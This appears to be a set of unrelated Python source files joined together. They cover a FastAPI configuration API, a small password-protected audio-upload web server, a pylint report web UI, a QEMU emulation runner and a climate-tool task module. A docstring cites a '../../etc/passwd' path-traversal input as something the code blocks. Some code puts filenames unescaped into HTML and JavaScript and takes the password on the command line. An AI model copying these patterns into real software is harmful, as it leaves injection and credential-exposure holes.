                                                       "example": {"status": "Error", "message": "Error message."}}}}})
async def get_config_id(config_id):
    """Return the monitoring configuration stored under *config_id*."""
    if not validate_uuid4(config_id):
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
    stored = get_config(config_id)
    if stored == 0:
        # Unknown id.
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
    if stored == -1:
        # Database failure.
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
    return stored
@app.get("/settings", responses={200: {"model": List[Response_Config_Model],
                                       "content": {"application/json": {
                                           "example": [json_response_enable]}}},
                                 404: {"model": Response_Error_Model,
                                       "content": {"application/json": {
                                           "example": {"status": "Error", "message": "Error message."}}}}})
async def get_all_configs():
    """Return every stored monitoring configuration."""
    configs = get_configs()
    if configs == -1:
        # Database failure while listing configurations.
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
    return configs
@app.put("/settings/{config_id}", responses={200: {"model": Response_Config_Model,
                                                   "content": {"application/json": {
                                                       "example": json_response_enable}}},
                                             404: {"model": Response_Error_Model,
                                                   "content": {"application/json": {
                                                       "example": {"status": "Error", "message": "Error message."}}}}})
async def update_config_id(config_id, config: Update_Config_Model):
    """Update the monitoring configuration stored under *config_id*."""
    global update_queue_flag
    if not validate_uuid4(config_id):
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
    resp = update_config(config_id, config)
    # update_config signals failures through sentinel integer return codes.
    errors = {
        0: "Config id invalid.",
        1: "Arguments invalid.",
        2: "Timestamp end must be superior to the actual.",
        -1: "Error in update config in database.",
    }
    if isinstance(resp, int) and resp in errors:
        return JSONResponse(status_code=404, content={"status": "Error", "message": errors[resp]})
    update_queue_flag = True
    info_log(200, f'Monitoring spec {config_id} successfully updated')
    return resp
@app.put("/settings/{config_id}/enable", responses={200: {"model": Response_Config_Model,
                                                          "content": {"application/json": {
                                                              "example": json_response_enable}}},
                                                    404: {"model": Response_Error_Model,
                                                          "content": {"application/json": {
                                                              "example": {"status": "Error", "message": "Error message."}}}}})
async def enable_config_id(config_id):
    """Enable the monitoring configuration stored under *config_id*."""
    global update_queue_flag
    if not validate_uuid4(config_id):
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
    resp = enable_config(config_id)
    # enable_config signals failures through sentinel integer return codes.
    errors = {
        0: "Config id invalid.",
        1: "Config already enabled.",
        -1: "Error in enable config in database.",
    }
    if isinstance(resp, int) and resp in errors:
        return JSONResponse(status_code=404, content={"status": "Error", "message": errors[resp]})
    update_queue_flag = True
    info_log(200, f'Monitoring spec {config_id} successfully enabled')
    return resp
@app.put("/settings/{config_id}/disable", responses={200: {"model": Response_Config_Model,
                                                           "content": {"application/json": {
                                                               "example": json_response_disable}}},
                                                     404: {"model": Response_Error_Model,
                                                           "content": {"application/json": {
                                                               "example": {"status": "Error", "message": "Error message."}}}}})
async def disable_config_id(config_id):
    """Disable the monitoring configuration stored under *config_id*."""
    global update_queue_flag
    if not validate_uuid4(config_id):
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
    resp = disable_config(config_id)
    # disable_config signals failures through sentinel integer return codes.
    errors = {
        0: "Config id invalid.",
        1: "Config already disabled.",
        -1: "Error in disable config in database.",
    }
    if isinstance(resp, int) and resp in errors:
        return JSONResponse(status_code=404, content={"status": "Error", "message": errors[resp]})
    update_queue_flag = True
    info_log(200, f'Monitoring spec {config_id} successfully disabled')
    return resp
@app.delete("/settings/{config_id}", status_code=HTTP_204_NO_CONTENT, responses={404: {"model": Response_Error_Model,
                                                                                       "content": {"application/json": {
                                                                                           "example": {"status": "Error", "message": "Error message."}}}}})
async def delete_config_id(config_id):
    """Delete the monitoring configuration stored under *config_id*."""
    global update_queue_flag
    if not validate_uuid4(config_id):
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
    resp = delete_config(config_id)
    # delete_config signals failures through sentinel integer return codes.
    errors = {
        0: "Config id invalid.",
        -1: "Error in delete config in database.",
    }
    if isinstance(resp, int) and resp in errors:
        return JSONResponse(status_code=404, content={"status": "Error", "message": errors[resp]})
    update_queue_flag = True
    info_log(200, f'Monitoring spec {config_id} successfully deleted')
    return Response(status_code=HTTP_204_NO_CONTENT)
|
hserv.py | from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import time
import cgi
import os
import sys
import subprocess
# Require the admin password as the single CLI argument; bail out with usage.
if len(sys.argv) != 2:
    print("python3 hserv.py password")
    sys.exit(0)
class WebServer(BaseHTTPRequestHandler):
    """Tiny admin web UI for managing song/news audio files.

    All POST handlers are protected by a shared password taken from
    sys.argv[1]. Client-supplied file names are sanitised with
    os.path.basename to prevent path traversal (e.g. "../../etc/passwd"),
    which the original code was vulnerable to in the delete and upload
    handlers. The duplicated POST branches are factored into helpers.
    """

    def do_GET(self):
        if self.path == "/":
            self.html_out("startseite.html")
        elif self.path == "/background":
            self.jpeg_out("musik.jpg")

    def do_POST(self):
        form = self._parse_form()
        if not self._authorized(form):
            # Wrong or missing password: fall back to the start page.
            self.html_out("startseite.html")
            return
        if self.path == "/start":
            self.html_out_dir("files.html")
        elif self.path == "/deletesong":
            self._delete(form, "songs/")
        elif self.path == "/deletenews":
            self._delete(form, "news/")
        elif self.path == "/upsong":
            self._upload(form, "songs/")
        elif self.path == "/upnews":
            self._upload(form, "news/")

    def _parse_form(self):
        """Parse the POST body as form data (multipart or url-encoded)."""
        return cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST", "CONTENT_TYPE": self.headers["Content-Type"]})

    def _authorized(self, form):
        """True when the submitted password matches the CLI password."""
        return "pass" in form and form["pass"].value == sys.argv[1]

    def _delete(self, form, directory):
        """Delete one file inside *directory* and re-render the file list."""
        # basename() blocks "../" path traversal in the client-supplied name.
        os.remove(directory + os.path.basename(form["delete"].value))
        self.html_out_dir("files.html")

    def _upload(self, form, directory):
        """Store the uploaded file, convert it, then re-render the file list."""
        filename = os.path.basename(form["file"].filename)
        with open(filename, "wb") as f:
            f.write(form["file"].file.read())
        # convert.py transcodes the upload into the target directory.
        subprocess.Popen(["/usr/bin/python3", "convert.py", filename, directory + os.path.basename(form["title"].value)]).wait()
        os.remove(filename)
        self.html_out_dir("files.html")

    def jpeg_out(self, filename):
        """Send *filename* as an image/jpeg response."""
        self.send_response(200)
        self.send_header("Content-type", "image/jpeg")
        self.end_headers()
        with open(filename, "rb") as f:
            self.wfile.write(f.read())

    def html_out(self, filename):
        """Send *filename* as HTML, substituting <TIME> with the current time."""
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        with open(filename) as f:
            out = f.read()
        self.wfile.write(out.replace("<TIME>", self._now()).encode())

    def html_out_dir(self, filename):
        """Send *filename* as HTML with <TIME> and <FILES> placeholders filled.

        <FILES> is replaced with upload forms plus one delete form per file
        in songs/ and news/.
        """
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        lshtml = "<div class=\"lscroller\"><form class=\"afile\" method=\"POST\" action=\"/upsong\" enctype=\"multipart/form-data\"> Titel: <input type=\"text\" name=\"title\" class=\"passwd\"> <input type=\"file\" name=\"file\" accept=\"audio/*\"> Passwort: <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"hochladen\"></form><br><br>"
        for fn in os.listdir("songs/"):
            lshtml += "<form class=\"afile\" method=\"POST\" action=\"/deletesong\">" + fn + "<input type=\"hidden\" name=\"delete\" value=\"" + fn + "\"> <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"delete\"></form><br>"
        lshtml += "<br></div><div class=\"rscroller\"><form class=\"anews\" method=\"POST\" action=\"/upnews\" enctype=\"multipart/form-data\"> Titel: <input type=\"text\" name=\"title\" class=\"passwd\"> <input type=\"file\" name=\"file\" accept=\"audio/*\"> Passwort: <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"hochladen\"></form><br><br>"
        for fn in os.listdir("news/"):
            lshtml += "<form class=\"anews\" method=\"POST\" action=\"/deletenews\">" + fn + "<input type=\"hidden\" name=\"delete\" value=\"" + fn + "\"> <input type=\"password\" name=\"pass\" class=\"passwd\"> <input type=\"submit\" value=\"delete\"></form><br>"
        lshtml += "<br></div>"
        with open(filename) as f:
            out = f.read()
        out = out.replace("<TIME>", self._now())
        out = out.replace("<FILES>", lshtml)
        self.wfile.write(out.encode())

    def _now(self):
        """Current local time formatted HH:MM."""
        ltime = time.localtime()
        return ("%2.2d" % ltime[3]) + ":" + ("%2.2d" % ltime[4])

    def log_message(self, format, *args):
        # Suppress the default per-request stderr logging.
        return
def webserverloop():
    """Serve the admin UI forever on port 8100, on all interfaces."""
    hsrv = HTTPServer(('0.0.0.0', 8100), WebServer)
    hsrv.serve_forever()
# Run the HTTP server in a background thread so the main thread stays free.
Thread(target=webserverloop).start()
|
lint_check.py | from __future__ import print_function
import subprocess
import xml.dom
import xml.dom.minidom
import re
import os
import os.path
from optparse import OptionParser
from collections import namedtuple
from . import monitor
from . import webserver
import json
try:
import urlparse
except ModuleNotFoundError:
from urllib import parse as urlparse
import threading
ReportMessageLine = namedtuple('ReportMessageLine', 'filename lineno state message_id method_id message_string')
ReportOnAFile = namedtuple('ReportOnAFile', 'filename state_to_number_of_messages')
class PylintReport(object):
    """Aggregated view over a list of parsed pylint message lines."""

    def __init__(self, messages):
        self.messages = messages

    def filenames(self):
        """Sorted list of distinct file names that have messages."""
        return sorted({message.filename for message in self.messages})

    def filereports(self):
        """One ReportOnAFile per file, counting messages per state letter."""
        reports = {}
        for message in self.messages:
            if message.filename not in reports:
                reports[message.filename] = ReportOnAFile(
                    message.filename,
                    self.new_state_to_number_of_messages_dict()
                )
            reports[message.filename].state_to_number_of_messages[message.state] += 1
        return sorted(reports.values(), key=lambda report: report.filename)

    def get_messages_of_file(self, filename):
        """All messages belonging to *filename*, in original order."""
        return [message for message in self.messages if message.filename == filename]

    def to_dict(self):
        """JSON-serialisable summary of the report."""
        return {'filereports': [report._asdict() for report in self.filereports()]}

    def new_state_to_number_of_messages_dict(self):
        """Fresh zeroed counter for each pylint message category."""
        return {'C': 0, 'W': 0, 'F': 0, 'R': 0, 'E': 0}
class InterfaceToPyLint(object):
    """Thin wrapper that runs the external `pylint` command and parses its output."""

    NAME_OF_THE_COMMAND = 'pylint'

    def is_available(self):
        """True when the pylint executable can be found via `which`."""
        process = subprocess.Popen(
            ['which', self.NAME_OF_THE_COMMAND],
            stdout = subprocess.PIPE,
            stderr = subprocess.PIPE,
        )
        process.communicate()
        return process.returncode == 0

    def run_onfile(self, path, extra_python_paths):
        """Run pylint on *path* and return the parsed PylintReport."""
        environment = self.get_environment_with_pythonpath(extra_python_paths)
        process = subprocess.Popen(
            [self.NAME_OF_THE_COMMAND, '-f', 'parseable', '-i', 'y', path],
            stdout = subprocess.PIPE,
            stderr = subprocess.PIPE,
            env = environment
        )
        stdout_string, stderr_string = process.communicate()
        # BUGFIX: communicate() returns bytes on Python 3; decode before
        # matching against str regular expressions in parse_report().
        return self.parse_report(stdout_string.decode('utf-8', errors='replace'))

    def parse_report(self, string):
        """Parse pylint 'parseable' output into a PylintReport."""
        messages = []
        lines = string.splitlines()
        # BUGFIX: raw strings -- the old plain literals relied on escape
        # sequences (\:, \d) that are invalid/deprecated in modern Python.
        regexp = re.compile(r"(.+?)\:(\d+)\: \[(.)(\d\d\d\d)(?:, (.+?))?\] (.*)")
        number_of_statements_re = re.compile(r"(\d+) statements analysed.")
        for line in lines:
            match = regexp.match(line)
            if match is not None:
                messages.append(ReportMessageLine(*match.groups()))
            match = number_of_statements_re.match(line)
            if match is not None:
                print(match.groups())
                print(match.group(1))
                number_of_statements = int(match.group(1))
        return PylintReport(messages)

    def get_environment_with_pythonpath(self, extra_python_paths):
        """Copy of os.environ with *extra_python_paths* appended to PYTHONPATH."""
        environment = os.environ.copy()
        new_pythonpath = ':'.join(extra_python_paths)
        if 'PYTHONPATH' in environment:
            new_pythonpath = environment['PYTHONPATH'] + ':' + new_pythonpath
        environment['PYTHONPATH'] = new_pythonpath
        return environment
# Inline stylesheet for the generated XHTML report: background colours for
# the number/line columns plus one set-/unset- colour pair per pylint
# message category (C/R/W/E/F).
CSS_STRING = """
.numbers {background-color: #eee;}
.lines {background-color: #ffffe0 ;}
.state {background-color: #eee; width: 1.5em; text-align: center;}
.state a {padding-left: 0.5em; padding-right: 0.5em; text-decoration: none;}
.set-C {background-color: lightblue;}
.unset-C {}
.set-R {background-color: #666;}
.unset-R {}
.set-W {background-color: yellow;}
.unset-W {}
.set-E {background-color: red;}
.unset-E {}
.set-F {background-color: orange;}
.unset-F {}
.state a:visited, a {
color: black;
}
.state a:hover {
color: #CD5C5C;
}
"""
class MakeHTMLDomFromFile(object):
    """Build an XHTML view of one source file annotated with pylint markers.

    The file is rendered as a table: line numbers | five per-state marker
    columns (C/R/W/E/F) | the raw file text. Each marker is a link that
    asks the server to open the file at that line in an editor.
    """

    def __init__(self, path, messages):
        # messages: sequence of ReportMessageLine tuples for this file.
        self.path = path
        self.filecontents = self.get_filecontents()
        self.messages = messages
        self.number_of_lines_in_the_file = self.get_number_of_lines_in_the_file()

    def get_filecontents(self):
        """Read and return the whole source file as one string."""
        with open(self.path, "r") as file:
            return file.read()

    def get_number_of_lines_in_the_file(self):
        """Number of lines in the file being rendered."""
        lines = self.filecontents.splitlines()
        return len(lines)

    def start(self):
        """Build the DOM; the serialised XHTML ends up in self.result."""
        self.document = self.new_document()
        self.head = self.document.createElement("head")
        # jQuery is required by the onclick handlers added in add_state_line().
        script = self.document.createElement("script")
        script.setAttribute("type","text/javascript")
        script.setAttribute("src", "http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.js")
        self.head.appendChild(script)
        self.document.documentElement.appendChild(self.head)
        self.body = self.document.createElement("body")
        self.document.documentElement.appendChild(self.body)
        # One row, seven columns: numbers, C, R, W, E, F, file contents.
        table = self.new_table(1,7)
        tr = table.firstChild
        td1 = tr.firstChild
        td2 = tr.lastChild
        td1.setAttribute("class", "numbers")
        td2.setAttribute("class", "lines")
        for i in range(1,6):
            tr.childNodes[i].setAttribute("class", "state")
        state_characters = ('C', 'R', 'W', 'E', 'F')
        for i, state_character in enumerate(state_characters):
            self.add_state_line(state_character, tr.childNodes[i+1])
        # Left column: the line numbers 1..N, one per line.
        counts = [str(x+1) for x in range(self.number_of_lines_in_the_file)]
        pre = self.document.createElement("pre")
        pre.appendChild(self.document.createTextNode('\n'.join(counts)))
        td1.appendChild(pre)
        # Right column: the raw file contents inside a CDATA section.
        pre = self.document.createElement("pre")
        file_data = self.document.createCDATASection(self.filecontents)
        pre.appendChild(file_data)
        self.document.documentElement.setAttribute("xmlns",xml.dom.XHTML_NAMESPACE)
        td2.appendChild(pre)
        self.body.appendChild(table)
        self.add_stylesheet()
        self.result = self.document.toxml()
        self.document.unlink()

    def add_state_line(self, state_character, td):
        """Fill one marker column: one letter per file line, highlighted
        (class "set-X") when a message of this state exists on that line."""
        # Map line number -> list of message strings for this state.
        line_number_to_messages = {}
        for message in self.messages:
            if message[2] == state_character:
                line_number = int(message[1])
                message_strings = line_number_to_messages.setdefault(line_number, [])
                message_strings.append(message[5])
                line_number_to_messages[line_number] = message_strings
        pre = self.document.createElement("pre")
        for line_number in range(1, self.number_of_lines_in_the_file+1):
            span = self.document.createElement("a")
            span.appendChild(self.document.createTextNode(state_character))
            pre.appendChild(span)
            pre.appendChild(self.document.createTextNode('\n'))
            filename = os.path.join(os.getcwd(), self.path)
            # Clicking a marker asks the server to open the file in an editor.
            span.setAttribute("href","#");
            span.setAttribute("onclick","javascript:$.getJSON('/open_file', {'path':'"+filename+"', 'lineno':"+str(line_number)+"}, function handle_result(data){}); false");
            if line_number in line_number_to_messages:
                span.setAttribute("class", "set-"+state_character)
                span.setAttribute("title", str(line_number_to_messages[line_number]))
            else:
                span.setAttribute("class", "unset-"+state_character)
        td.appendChild(pre)

    def new_table(self, number_of_rows, number_of_columns):
        """Create an empty table element of the given dimensions."""
        table = self.document.createElement("table")
        for row in range(number_of_rows):
            tr = self.document.createElement("tr")
            table.appendChild(tr)
            for column in range(number_of_columns):
                td = self.document.createElement("td")
                tr.appendChild(td)
        return table

    def new_document(self):
        """Create an empty XHTML DOM document with an <xhtml> root."""
        implementation = xml.dom.minidom.getDOMImplementation()
        return implementation.createDocument(xml.dom.XHTML_NAMESPACE, "xhtml", None)

    def add_stylesheet(self):
        """Attach the module-level CSS_STRING stylesheet to the head."""
        self.style = self.document.createElement("style")
        self.style.setAttribute("type", "text/css")
        self.head.appendChild(self.style)
        stylesheet_string = CSS_STRING
        stylesheet_cdata = self.document.createCDATASection(stylesheet_string)
        self.style.appendChild(stylesheet_cdata)
class HandleRequest(webserver.HandleRequest):
    """Request handlers for the lint web UI.

    Dispatch (the index_file / do_* naming convention) is defined by the
    webserver.HandleRequest base class, which is not visible here.
    Each handler returns a (body, content_type) pair.
    """

    def index_file(self):
        """Serve lint_check.html, located next to this module."""
        base = os.path.split(__file__)[0]
        filename = os.path.join(base, "lint_check.html")
        with open(filename, "r") as file:
            contents = file.read()
        return contents, 'text/html'

    def do_start(self):
        """Trigger a new lint run on the server; respond with a JS null."""
        self.server.start_lint()
        return 'null', 'text/javascript'

    def do_show_file(self):
        """Render one analysed file as XHTML with per-line message markers."""
        parameters = urlparse.parse_qs(self.parsed_path.query)
        filename = parameters['path'][0]
        messages = self.server.last_report.get_messages_of_file(filename)
        x = MakeHTMLDomFromFile(filename, messages)
        x.start()
        return x.result, 'application/xhtml+xml'

    def do_get_last_report(self):
        """Return the last report summary serialised as JSON."""
        string = json.dumps(self.server.get_last_report_as_dict())
        content_type = 'text/javascript'
        return string, content_type
class LintWebServer(webserver.WebServer):
    """Web server that runs pylint over the source tree and serves the report."""

    def __init__(self, port):
        webserver.WebServer.__init__(self, port, HandleRequest)
        # NOTE(review): this runs pylint synchronously in the constructor,
        # so server start-up blocks until the first lint pass finishes.
        self.run_lint()

    def start_lint(self):
        """Kick off a lint run in a background thread (called from the UI)."""
        thread = threading.Thread(target=self.run_lint)
        thread.start()

    def run_lint(self):
        """Run pylint over the hard-coded 'src/amuse' tree and store the report."""
        print("running lint")
        self.set_last_report(InterfaceToPyLint().run_onfile(
            'src/amuse',
            [os.path.join(os.getcwd(), 'src/amuse/support')]))
        print("done...")

    def get_last_report_as_dict(self):
        """JSON-serialisable form of the most recent report."""
        return self.last_report.to_dict()

    def set_last_report(self, report):
        self.last_report = report
        # Presumably notifies waiting clients that a run finished;
        # events_queue comes from the unseen webserver.WebServer base.
        self.events_queue.put('done')
def Run():
    """Entry point: check pylint availability, parse CLI options, start server."""
    pylint = InterfaceToPyLint()
    if not pylint.is_available():
        print("Error, pylint is not available.")
        print("please install pylint first, this can be done with 'easy_install pylint'")
        # BUGFIX: this module never imports sys, so the original sys.exit(1)
        # raised a NameError here; raise SystemExit directly instead.
        raise SystemExit(1)
    parser = OptionParser()
    parser.add_option("-p", "--port",
                      dest="serverport",
                      help="start serving on PORT",
                      metavar="PORT",
                      default=9071,
                      type="int")
    parser.add_option("-e", "--editor",
                      dest="editor",
                      help="preferred EDITOR for editing the files",
                      metavar="EDITOR",
                      default="geany",
                      type="string")
    (options, args) = parser.parse_args()
    print("starting server on port: ", options.serverport)
    webserver.EDITOR = options.editor
    server = LintWebServer(options.serverport)
    server.start()
# Run the lint web UI when executed directly (not on import).
if __name__ == '__main__':
    Run()
#print(InterfaceToPyLint().run_onfile('src/amuse/support/data', [os.path.join(os.getcwd(), 'src')]).to_dict())
|
armrunner.py | """
Terminal Runner class
"""
__author__ = "Bruno Chianca Ferreira"
__license__ = "MIT"
__version__ = "0.5"
__maintainer__ = "Bruno Chianca Ferreira"
__email__ = "brunobcf@gmail.com"
import traceback, os, logging, time, subprocess, threading
from classes.runner.runner import Runner
from core.nodes.base import CoreNode
from classes.mobility import mobility
class ARMRunner(Runner):
    """Runner that emulates a fleet of ARM nodes in QEMU, optionally bridged
    into a CORE network session with a batman-adv mesh."""

    def __init__(self, emulation):
        # Parse the 'arm' section of the emulation config, then set up mobility.
        self.setup(emulation)
        self.nodes_digest = {}
        self.iosocket_semaphore = False

    def setup(self, emulation):
        """Read all 'arm' configuration keys into attributes."""
        self.topology = emulation['arm']['topology']
        self.number_of_nodes = emulation['arm']['number_of_nodes']
        # Config values arrive as strings; convert "True"/"False" to booleans.
        self.core = True if emulation['arm']['core'] == "True" else False
        self.disks = True if emulation['arm']['disks'] == "True" else False
        self.dump = True if emulation['arm']['dump'] == "True" else False
        self.mobility_model = emulation['arm']['mobility']
        self.kernel = emulation['arm']['kernel']
        self.image = emulation['arm']['image_sufix']
        self.initrd = emulation['arm']['initrd']
        self.mac_sufix = emulation['arm']['mac_sufix']
        self.tap_interface = emulation['arm']['tap_interface']
        self.Mobility = mobility.Mobility(self, self.mobility_model)

    def start(self):
        self.run()

    def run(self):
        """
        Runs the emulation of Virtual machines running QEMU
        """
        #start core
        if self.core:
            # NOTE(review): core_topology(), configure_batman(), tcpdump*(),
            # server_thread and self.session/self.coreemu are not defined in
            # this class -- presumably inherited from Runner; TODO confirm.
            self.core_topology()
            self.configure_batman()
        #start dumps
        if self.dump:
            #get simdir
            simdir = str(time.localtime().tm_year) + "_" + str(time.localtime().tm_mon) + "_" + str(time.localtime().tm_mday) + "_" + str(time.localtime().tm_hour) + "_" + str(time.localtime().tm_min)
            #createDumps(number_of_nodes, "./reports/" + simdir + "/tracer")
            # NOTE(review): self.omnet is never assigned in setup(), so this
            # branch looks like it raises AttributeError -- TODO confirm.
            if self.omnet:
                self.tcpdump(self.number_of_nodes, "./reports/" + simdir + "/tracer")
            if self.core:
                self.tcpdump_core(self.number_of_nodes, "./reports/" + simdir + "/tracer")
        if self.core:
            #pass
            sthread = threading.Thread(target=self.server_thread, args=())
            sthread.start()
            self.configure_bridge()
        qemu_nodes = self.spawnQEMU(self.session, self.number_of_nodes)
        while True:
            time.sleep(0.1)
        # NOTE(review): everything below is unreachable -- the loop above
        # never breaks -- and 'username' is undefined here. TODO confirm intent.
        # shutdown session
        logging.info("Simulation finished. Killing all processes")
        if self.core:
            self.coreemu.shutdown()
        os.system("sudo killall xterm")
        os.system("chown -R " + username + ":" + username + " ./reports")

    def configure_bridge(self):
        """Open one xterm per CORE node that bridges tap0 and bat0 via br0."""
        process = []
        for i in range(0,self.number_of_nodes):
            shell = self.session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash")
            command = "ip tuntap add tap0 mode tap"
            command += " && ip link add br0 type bridge"
            command += " && ip link set br0 up"
            command += " && ip link set tap0 up"
            command += " && ip link set tap0 master br0"
            command += " && ip link set bat0 master br0"
            shell += " -c '" + command + "'"
            node = subprocess.Popen([
                "xterm",
                "-e",
                shell], stdin=subprocess.PIPE, shell=False)
            process.append(node)

    def spawnQEMU(self, session, number_of_nodes):
        """Launch one qemu-system-aarch64 VM per node inside an xterm.

        Returns a dict mapping "drone<i>" to the Popen handle of its xterm.
        """
        print("Starting QEMU")
        nodes = {}
        for i in range(0,number_of_nodes):
            shell = session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash")
            command = "qemu-system-aarch64"
            command += " -kernel " + self.kernel
            command += " -initrd " + self.initrd
            command += " -m 1024 -M virt -cpu cortex-a53"
            command += " -serial mon:stdio"
            command += " -append \"rw root=/dev/vda1 console=ttyAMA0 loglevel=8 rootwait fsck.repair=yes memtest=1\""
            command += " -drive file=" + self.image + str(i) + ".img,format=raw,if=sd,id=hd-root"
            command += " -device virtio-blk-device,drive=hd-root"
            # MAC suffix is the node index as two hex digits.
            command += " -net nic,macaddr=" + self.mac_sufix + str('{0:0{1}X}'.format(i,2))# + " -net user"
            command += " -net tap,ifname=" + self.tap_interface + ",script=no,downscript=no"
            command += " -no-reboot"
            shell += " -c '" + command + "'"
            node = subprocess.Popen([
                "xterm",
                "-e",
                shell], stdin=subprocess.PIPE, shell=False)
            nodes["drone" + str(i)] = node
        return nodes
|
_task.py | """ESMValtool task definition"""
import contextlib
import datetime
import errno
import logging
import numbers
import os
import pprint
import subprocess
import threading
import time
from multiprocessing import Pool, cpu_count
import psutil
import yaml
logger = logging.getLogger(__name__)
DATASET_KEYS = {
'mip',
}
def which(executable):
    """Find executable in PATH; return its full path or None."""
    for directory in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(directory, executable)
        if os.access(candidate, os.X_OK):
            return candidate
    return None
def _get_resource_usage(process, start_time, children=True):
    """Get resource usage.

    Generator yielding one tab-separated log line per iteration: first the
    header row, then a cumulative CPU/memory/disk snapshot for *process*
    (and, when *children* is True, all of its descendants). It does not
    sleep itself -- pacing is the caller's responsibility.
    """
    # yield header first
    entries = [
        'Date and time (UTC)',
        'Real time (s)',
        'CPU time (s)',
        'CPU (%)',
        'Memory (GB)',
        'Memory (%)',
        'Disk read (GB)',
        'Disk write (GB)',
    ]
    fmt = '{}\t' * len(entries[:-1]) + '{}\n'
    yield fmt.format(*entries)
    # Compute resource usage
    gigabyte = float(2**30)
    # Rounding precision per data column (None = leave the value untouched).
    precision = [1, 1, None, 1, None, 3, 3]
    # cache maps each seen process to its latest
    # [cpu_time, cpu%, mem_gb, mem%, read_gb, write_gb] sample; processes
    # that disappeared keep their totals but rate-like columns are zeroed.
    cache = {}
    while process.is_running():
        try:
            if children:
                # Include child processes
                processes = process.children(recursive=True)
                processes.append(process)
            else:
                processes = [process]
            # Update resource usage
            for proc in cache:
                # Set cpu percent and memory usage to 0 for old processes
                if proc not in processes:
                    cache[proc][1] = 0
                    cache[proc][2] = 0
                    cache[proc][3] = 0
            for proc in processes:
                # Update current processes
                cache[proc] = [
                    proc.cpu_times().user + proc.cpu_times().system,
                    proc.cpu_percent(),
                    proc.memory_info().rss / gigabyte,
                    proc.memory_percent(),
                    proc.io_counters().read_bytes / gigabyte,
                    proc.io_counters().write_bytes / gigabyte,
                ]
        except (OSError, psutil.AccessDenied, psutil.NoSuchProcess):
            # Try again if an error occurs because some process died
            continue
        # Create and yield log entry: sum the per-process columns, then
        # prepend elapsed wall-clock time and the current UTC timestamp.
        entries = [sum(entry) for entry in zip(*cache.values())]
        entries.insert(0, time.time() - start_time)
        entries = [round(entry, p) for entry, p in zip(entries, precision)]
        entries.insert(0, datetime.datetime.utcnow())
        yield fmt.format(*entries)
@contextlib.contextmanager
def resource_usage_logger(pid, filename, interval=1, children=True):
    """Log resource usage.

    Context manager: while the with-block runs, a background thread samples
    the resource usage of process *pid* every *interval* seconds and writes
    the lines to *filename*. On exit the thread is signalled via an Event
    and joined.
    """
    halt = threading.Event()

    def _log_resource_usage():
        """Write resource usage to file."""
        process = psutil.Process(pid)
        start_time = time.time()
        with open(filename, 'w') as file:
            for msg in _get_resource_usage(process, start_time, children):
                file.write(msg)
                # Pace the generator; check the halt flag between samples.
                time.sleep(interval)
                if halt.is_set():
                    return

    thread = threading.Thread(target=_log_resource_usage)
    thread.start()
    try:
        yield
    finally:
        halt.set()
        thread.join()
def _py2ncl(value, var_name=''):
"""Format a structure of Python list/dict/etc items as NCL."""
txt = var_name + ' = ' if var_name else ''
if value is None:
txt += '_Missing'
elif isinstance(value, str):
txt += '"{}"'.format(value)
elif isinstance(value, (list, tuple)):
if not value:
txt += '_Missing'
else:
if isinstance(value[0], numbers.Real):
type_ = numbers.Real
else:
type_ = type(value[0])
if any(not isinstance(v, type_) for v in value):
raise ValueError(
"NCL array cannot be mixed type: {}".format(value))
txt += '(/{}/)'.format(', '.join(_py2ncl(v) for v in value))
elif isinstance(value, dict):
if not var_name:
raise ValueError(
"NCL does not support nested dicts: {}".format(value))
txt += 'True\n'
for key in value:
txt += '{}@{} = {}\n'.format(var_name, key, _py2ncl(value[key]))
else:
txt += str(value)
return txt
def write_ncl_settings(settings, filename, mode='wt'):
    """Write a dictionary with generic settings to NCL file."""
    logger.debug("Writing NCL configuration file %s", filename)

    def _ncl_type(value):
        """Convert some Python types to NCL types."""
        typemap = {
            bool: 'logical',
            str: 'string',
            float: 'double',
            int: 'int64',
            dict: 'logical',
        }
        for python_type, ncl_type in typemap.items():
            if isinstance(value, python_type):
                return ncl_type
        raise ValueError("Unable to map {} to an NCL type".format(type(value)))

    chunks = []
    for var_name, value in sorted(settings.items()):
        if isinstance(value, (list, tuple)):
            # Create an NCL list that can span multiple files
            chunks.append('if (.not. isdefined("{var_name}")) then\n'
                          ' {var_name} = NewList("fifo")\n'
                          'end if\n'.format(var_name=var_name))
            for item in value:
                chunks.append('ListAppend({var_name}, new(1, {type}))\n'
                              'i = ListCount({var_name}) - 1'.format(
                                  var_name=var_name, type=_ncl_type(item)))
                chunks.append(_py2ncl(item, var_name + '[i]'))
        else:
            # Create an NCL variable that overwrites previous variables
            chunks.append('if (isvar("{var_name}")) then\n'
                          ' delete({var_name})\n'
                          'end if\n'.format(var_name=var_name))
            chunks.append(_py2ncl(value, var_name))

    with open(filename, mode) as file:
        file.write('\n'.join(chunks))
        file.write('\n')
class AbstractTask(object):
    """Base class for defining task classes.

    A task has settings, an output directory and a list of ancestor tasks
    whose outputs feed into it.  Subclasses implement :meth:`_run`.
    """

    def __init__(self, settings, output_dir, ancestors=None):
        """Initialize task."""
        self.settings = settings
        self.ancestors = [] if ancestors is None else ancestors
        self.output_dir = output_dir
        self.output_files = None  # populated by run()

    def flatten(self):
        """Return a flattened set of all ancestor tasks and task itself."""
        flat = {self}
        for ancestor in self.ancestors:
            flat |= ancestor.flatten()
        return flat

    def run(self, input_files=None):
        """Run the task (and its ancestors) once; return the output files."""
        if self.output_files:
            return self.output_files
        if input_files is None:
            input_files = []
